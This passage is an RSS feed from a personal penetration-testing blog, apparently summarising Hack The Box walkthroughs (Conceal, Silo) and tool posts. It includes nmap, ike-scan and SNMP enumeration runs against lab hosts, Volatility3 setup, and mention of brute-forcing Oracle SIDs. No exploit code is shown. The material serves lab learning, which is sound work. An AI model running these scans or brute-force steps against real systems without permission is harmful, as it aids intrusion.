 VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
 VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
 VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
 VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
 VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

Ending ike-scan 1.9.4: 1 hosts scanned in 0.325 seconds (3.08 hosts/sec). 1 returned handshake; 0 returned notify
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;The tunnel uses IKE-V1 as per above results.To confirm its not running on IKE-V2&lt;/p&gt;</description></item><item><title>Hackthebox Conceal</title><link>https://www.rchitect.in/posts/htb-conceal/</link><pubDate>Mon, 07 Mar 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-conceal/</guid><description>&lt;h1 id="hackthebox-conceal-walkthrough"&gt;
 Hackthebox Conceal Walkthrough
 &lt;a class="heading-link" href="#hackthebox-conceal-walkthrough"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/conceal/1.png" alt="conceal"&gt;&lt;/p&gt;
&lt;h3 id="initial-enumeration"&gt;
 Initial Enumeration
 &lt;a class="heading-link" href="#initial-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h3&gt;
&lt;h4 id="port-scan"&gt;
 Port Scan
 &lt;a class="heading-link" href="#port-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;$ sudo nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.116
sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.116
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 19:46 EST
Nmap scan report for 10.10.10.116
Host is up.
All 65535 scanned ports on 10.10.10.116 are filtered

Nmap done: 1 IP address (1 host up) scanned in 130.18 seconds
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-27 19:48 EST
Nmap scan report for 10.10.10.116
Host is up (0.16s latency).
Not shown: 65534 open|filtered ports
PORT STATE SERVICE
500/udp open isakmp

Nmap done: 1 IP address (1 host up) scanned in 14.25 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;I have decided to run the &lt;a href="https://rchitect.in/posts/autorecon/" class="external-link" target="_blank" rel="noopener"&gt;Autorecon&lt;/a&gt; script as well to confirm i have not missed anything. It took longer time(more than 40min). I could see and additinal udp port 161 as well.Full results are uploaded [here](&lt;a href="https://github.com/tcprks/Rchitect/blob/Yoda/CTF/conceal/_top_100_udp_nmap.txt" class="external-link" target="_blank" rel="noopener"&gt;Rchitect/_top_100_udp_nmap.txt at Yoda · tcprks/Rchitect · GitHub&lt;/a&gt;). There 2 services to enumerate( SNMP and ISAKMP)&lt;/p&gt;</description></item><item><title>Memory Dump Analysis usining Volatility3</title><link>https://www.rchitect.in/posts/volatility3/</link><pubDate>Sun, 27 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/volatility3/</guid><description>&lt;h1 id="memory-dump-analysis-volatility3"&gt;
 Memory Dump Analysis-Volatility3
 &lt;a class="heading-link" href="#memory-dump-analysis-volatility3"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;We have memeory dump file which we will use Volatility3 for analysis for sensitive information like username/process&lt;/p&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/silo/11.png" alt="silo"&gt;&lt;/p&gt;
&lt;p&gt;There is tool Volatility to analayze the mempry dump. However in previous blogs posts it was Volatility2 which was working with python2 and after searching i have found volatility3 which works with python3.&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;git clone https://github.com/volatilityfoundation/volatility3.git
cd volatility3
python3 setup.py install
python3 vol.py —h
Cloning into &amp;#39;volatility3&amp;#39;...
remote: Enumerating objects: 26002, done.
remote: Counting objects: 100% (3001/3001), done.
remote: Compressing objects: 100% (1021/1021), done.
remote: Total 26002 (delta 2253), reused 2596 (delta 1968), pack-reused 23001
Receiving objects: 100% (26002/26002), 5.14 MiB | 200.00 KiB/s, done.


Volatility 3 Framework 2.0.2
usage: volatility [-h] [-c CONFIG] [--parallelism [{processes,threads,off}]] [-e EXTEND] [-p PLUGIN_DIRS] [-s SYMBOL_DIRS] [-v] [-l LOG] [-o OUTPUT_DIR] [-q]
 [-r RENDERER] [-f FILE] [--write-config] [--clear-cache] [--cache-path CACHE_PATH] [--offline] [--single-location SINGLE_LOCATION]
 [--stackers [STACKERS ...]] [--single-swap-locations [SINGLE_SWAP_LOCATIONS ...]]
 plugin ...
volatility: error: argument plugin: invalid choice —h (choose from banners.Banners, configwriter.ConfigWriter, frameworkinfo.FrameworkInfo, isfinfo.IsfInfo, layerwriter.LayerWriter, linux.bash.Bash, linux.check_afinfo.Check_afinfo, linux.check_creds.Check_creds, linux.check_idt.Check_idt, linux.check_modules.Check_modules, linux.check_syscall.Check_syscall, linux.elfs.Elfs, linux.keyboard_notifiers.Keyboard_notifiers, linux.kmsg.Kmsg, linux.lsmod.Lsmod, linux.lsof.Lsof, linux.malfind.Malfind, linux.proc.Maps, linux.pslist.PsList, linux.pstree.PsTree, linux.tty_check.tty_check, mac.bash.Bash, mac.check_syscall.Check_syscall, mac.check_sysctl.Check_sysctl, mac.check_trap_table.Check_trap_table, mac.ifconfig.Ifconfig, mac.kauth_listeners.Kauth_listeners, mac.kauth_scopes.Kauth_scopes, mac.kevents.Kevents, mac.list_files.List_Files, mac.lsmod.Lsmod, mac.lsof.Lsof, mac.malfind.Malfind, mac.mount.Mount, mac.netstat.Netstat, mac.proc_maps.Maps, mac.psaux.Psaux, mac.pslist.PsList, mac.pstree.PsTree, mac.socket_filters.Socket_filters, mac.timers.Timers, mac.trustedbsd.Trustedbsd, mac.vfsevents.VFSevents, timeliner.Timeliner, windows.bigpools.BigPools, windows.cachedump.Cachedump, windows.callbacks.Callbacks, windows.cmdline.CmdLine, windows.crashinfo.Crashinfo, windows.dlllist.DllList, windows.driverirp.DriverIrp, windows.driverscan.DriverScan, windows.dumpfiles.DumpFiles, windows.envars.Envars, windows.filescan.FileScan, windows.getservicesids.GetServiceSIDs, windows.getsids.GetSIDs, windows.handles.Handles, windows.hashdump.Hashdump, windows.info.Info, windows.ldrmodules.LdrModules, windows.lsadump.Lsadump, windows.malfind.Malfind, windows.memmap.Memmap, windows.mftscan.MFTScan, windows.modscan.ModScan, windows.modules.Modules, windows.mutantscan.MutantScan, windows.netscan.NetScan, windows.netstat.NetStat, windows.poolscanner.PoolScanner, windows.privileges.Privs, windows.pslist.PsList, windows.psscan.PsScan, windows.pstree.PsTree, windows.registry.certificates.Certificates, windows.registry.hivelist.HiveList, windows.registry.hivescan.HiveScan, windows.registry.printkey.PrintKey, windows.registry.userassist.UserAssist, windows.sessions.Sessions, windows.skeleton_key_check.Skeleton_Key_Check, windows.ssdt.SSDT, windows.statistics.Statistics, windows.strings.Strings, windows.svcscan.SvcScan, windows.symlinkscan.SymlinkScan, windows.vadinfo.VadInfo, windows.vadyarascan.VadYaraScan, windows.verinfo.VerInfo, windows.virtmap.VirtMap, yarascan.YaraScan)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Lets search for command format for Vol3 and i found&lt;a href="https://book.hacktricks.xyz/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples" class="external-link" target="_blank" rel="noopener"&gt; this&lt;/a&gt;.Some cammnds I have tried and results uploaded [here](&lt;a href="https://github.com/tcprks/Rchitect/blob/Yoda/CTF/silo/vol3-output" class="external-link" target="_blank" rel="noopener"&gt;Rchitect/vol3-output at Yoda · tcprks/Rchitect · GitHub&lt;/a&gt;).&lt;/p&gt;</description></item><item><title>Oracle DB exploit using ODAT</title><link>https://www.rchitect.in/posts/odat/</link><pubDate>Sun, 27 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/odat/</guid><description>&lt;h1 id="oracle-db-exploit-using-odat"&gt;
 Oracle DB exploit using ODAT
 &lt;a class="heading-link" href="#oracle-db-exploit-using-odat"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;Refer some of the nmap scan results here during the pentest&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;sudo nmap -sS -T4 -sV -sC 10.10.10.82 1 ⨯
[sudo] password for rocky: 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-24 06:14 EST
Nmap scan report for 10.10.10.82
Host is up (0.089s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 401 Unauthorized
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 15s, deviation: 0s, median: 14s
| smb-security-mode: 
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2022-02-24T11:16:31
|_ start_date: 2022-02-24T00:28:20

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 130.34 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h4 id="sometheory-on-oracle-dbfrom-pentest-point-of-view"&gt;
 SomeTheory on Oracle DB(from pentest point of view)
 &lt;a class="heading-link" href="#sometheory-on-oracle-dbfrom-pentest-point-of-view"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h4&gt;
&lt;p&gt;The above Nmap results shows 1521 port is open and there are some reference for oracle DB as well. 1521 is the port which oracle DB uses to communicate with external servers or applications. The key points if we know 1521 is open to identify the SID.We can call SID as unique database identifier. One of the Method is Bruteforcing. I could see some on metasploit as well.&lt;/p&gt;</description></item><item><title>Port 161,162 SNMP enumeration</title><link>https://www.rchitect.in/posts/snmp-enumeration/</link><pubDate>Sun, 27 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/snmp-enumeration/</guid><description>&lt;h1 id="snmp-enumeration-of-port-udp-ports-161-162"&gt;
 SNMP enumeration of port udp ports 161-162
 &lt;a class="heading-link" href="#snmp-enumeration-of-port-udp-ports-161-162"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;Initial Scan&lt;/p&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;sudo nmap -sU --open -p 161 10.10.10.116 -oG out.txt\$ cat out.txt 
# Nmap 7.91 scan initiated Sun Mar 6 18:06:39 2022 as: nmap -sU --open -p 161 -oG out.txt 10.10.10.116
Host: 10.10.10.116 () Status: Up
Host: 10.10.10.116 () Ports: 161/open|filtered/udp//snmp///
# Nmap done at Sun Mar 6 18:06:40 2022 -- 1 IP address (1 host up) scanned in 1.04 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Some Basic SNMP enumeration commands&lt;/p&gt;</description></item><item><title>Autorecon enumeration script in Kali linux</title><link>https://www.rchitect.in/posts/autorecon/</link><pubDate>Thu, 24 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/autorecon/</guid><description>&lt;p&gt;How to run Autorecon for Enumeration&lt;/p&gt;</description></item><item><title>Hackthebox Silo</title><link>https://www.rchitect.in/posts/htb-silo/</link><pubDate>Thu, 24 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-silo/</guid><description>&lt;h1 id="hackthebox-silo-walkthrough"&gt;
 Hackthebox Silo Walkthrough
 &lt;a class="heading-link" href="#hackthebox-silo-walkthrough"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/silo/1.png" alt="silo"&gt;&lt;/p&gt;
&lt;h3 id="initial-enumeration"&gt;
 Initial Enumeration
 &lt;a class="heading-link" href="#initial-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h3&gt;
&lt;h4 id="port-scan"&gt;
 Port Scan
 &lt;a class="heading-link" href="#port-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h4&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;─$ nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:46 EST
Nmap scan report for 10.10.10.82
Host is up (0.091s latency).
Not shown: 65261 filtered ports, 269 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 121.90 seconds

┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:48 EST
Nmap scan report for 10.10.10.82
Host is up (0.100s latency).
Not shown: 65268 filtered ports, 262 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 13.36 seconds

┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ sudo nmap -sU -p- -min-rate 10000 -Pn -oN alludp.txt 10.10.10.82
[sudo] password for rocky: 
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:49 EST
Warning: 10.10.10.82 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.82
Host is up (0.16s latency).
All 65535 scanned ports on 10.10.10.82 are open|filtered (65460) or closed (75)

Nmap done: 1 IP address (1 host up) scanned in 75.11 seconds

┌──(rocky㉿kali)-[~/hckbox/silo]
└─$ sudo nmap -p 80,135,139,445,8080 -Pn -sC -sV -oN detailed.txt 10.10.10.82
Host discovery disabled (-Pn). All addresses will be marked &amp;#39;up&amp;#39; and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:53 EST
Nmap scan report for 10.10.10.82
Host is up (0.16s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-server-header: Oracle XML DB/Oracle Database
|_http-title: 400 Bad Request
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 3s, deviation: 0s, median: 3s
| smb-security-mode: 
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode: 
| 2.02: 
|_ Message signing enabled but not required
| smb2-time: 
| date: 2022-02-24T00:53:53
|_ start_date: 2022-02-24T00:28:20

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.89 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h5 id="vulnrability-scan"&gt;
 Vulnrability Scan
 &lt;a class="heading-link" href="#vulnrability-scan"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;pre tabindex="0"&gt;&lt;code&gt;$ sudo nmap -p 80,135,139,445,8080 -script VULN 10.10.10.82
Starting Nmap 7.91 ( https://nmap.org ) at 2022-02-23 19:54 EST
Nmap scan report for 10.10.10.82
Host is up (0.057s latency).

PORT STATE SERVICE
80/tcp open http
|_http-csrf: Couldn&amp;#39;t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn&amp;#39;t find any DOM based XSS.
|_http-stored-xss: Couldn&amp;#39;t find any stored XSS vulnerabilities.
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
| http-enum: 
|_ /i/: Potentially interesting folder

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: No accounts left to try

Nmap done: 1 IP address (1 host up) scanned in 342.38 seconds
&lt;/code&gt;&lt;/pre&gt;&lt;h5 id="smb-enumeration"&gt;
 SMB enumeration
 &lt;a class="heading-link" href="#smb-enumeration"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;p&gt;It seems we may not get any information from SMB ports.&lt;/p&gt;</description></item><item><title>Hackthebox Buff</title><link>https://www.rchitect.in/posts/htb-buff/</link><pubDate>Wed, 23 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-buff/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Buff&lt;/p&gt;</description></item><item><title>ms17-010 eternal blue exploit using python3</title><link>https://www.rchitect.in/posts/ms17-010/</link><pubDate>Wed, 23 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/ms17-010/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Legacy&lt;/p&gt;</description></item><item><title>Port forwarding from Windows</title><link>https://www.rchitect.in/posts/port-forward/</link><pubDate>Wed, 23 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/port-forward/</guid><description>&lt;p&gt;How to do Port Forwarding in Windows&lt;/p&gt;</description></item><item><title>Transfer Files From Windows to Linux with SMB2 support</title><link>https://www.rchitect.in/posts/smb2-file-transfer/</link><pubDate>Wed, 23 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/smb2-file-transfer/</guid><description>&lt;p&gt;How to Transfer Files from Windows to Linux using SMB2&lt;/p&gt;</description></item><item><title>Default python version change in Kali</title><link>https://www.rchitect.in/posts/default-version-python/</link><pubDate>Tue, 22 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/default-version-python/</guid><description>&lt;p&gt;This post is about changing the default Python version in Kali&lt;/p&gt;</description></item><item><title>Hackthebox Legacy</title><link>https://www.rchitect.in/posts/htb-legacy/</link><pubDate>Tue, 22 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-legacy/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Legacy&lt;/p&gt;</description></item><item><title>Install Impacket in Kali</title><link>https://www.rchitect.in/posts/impacket-setup/</link><pubDate>Tue, 22 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/impacket-setup/</guid><description>&lt;p&gt;This post is about changing the default Python version in Kali&lt;/p&gt;</description></item><item><title>Hackthebox Bastard</title><link>https://www.rchitect.in/posts/htb-bastard/</link><pubDate>Thu, 17 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-bastard/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Bastard&lt;/p&gt;</description></item><item><title>Hackthebox Cascade</title><link>https://www.rchitect.in/posts/htb-cascade/</link><pubDate>Thu, 17 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-cascade/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Cascade&lt;/p&gt;</description></item><item><title>Hackthebox Friendzone</title><link>https://www.rchitect.in/posts/htb-friendzone/</link><pubDate>Wed, 16 Feb 2022 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/htb-friendzone/</guid><description>&lt;p&gt;This post is about the Walkthrough of the hackthebox machine: Friendzone&lt;/p&gt;</description></item><item><title>Finding Scoreboard/challenges page in Juicebox</title><link>https://www.rchitect.in/posts/juicebox-l1/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://www.rchitect.in/posts/juicebox-l1/</guid><description>&lt;h1 id="finding-the-score-board-in-juicebox"&gt;
 Finding the Score board in Juicebox
 &lt;a class="heading-link" href="#finding-the-score-board-in-juicebox"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h1&gt;
&lt;h5 id="installation"&gt;
 Installation
 &lt;a class="heading-link" href="#installation"&gt;
 &lt;i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"&gt;&lt;/i&gt;
 &lt;span class="sr-only"&gt;Link to heading&lt;/span&gt;
 &lt;/a&gt;
&lt;/h5&gt;
&lt;p&gt;The Installation has many options. The method i followed is packaged distribution installation.&lt;/p&gt;
&lt;p&gt;Download the latest package from [here](&lt;a href="https://github.com/juice-shop/juice-shop/releases/tag/v13.3.0" class="external-link" target="_blank" rel="noopener"&gt;Release v13.3.0 · juice-shop/juice-shop · GitHub&lt;/a&gt;).&lt;/p&gt;
&lt;p&gt;&lt;img src="https://www.rchitect.in/images/walk/juiceshop/2.png" alt="juice"&gt;&lt;/p&gt;
&lt;p&gt;For More details on other installation, can refer the[ github ](&lt;a href="https://github.com/juice-shop/juice-shop" class="external-link" target="_blank" rel="noopener"&gt;GitHub - juice-shop/juice-shop: OWASP Juice Shop: Probably the most modern and sophisticated insecure web application&lt;/a&gt;)page.&lt;/p&gt;</description></item></channel></rss>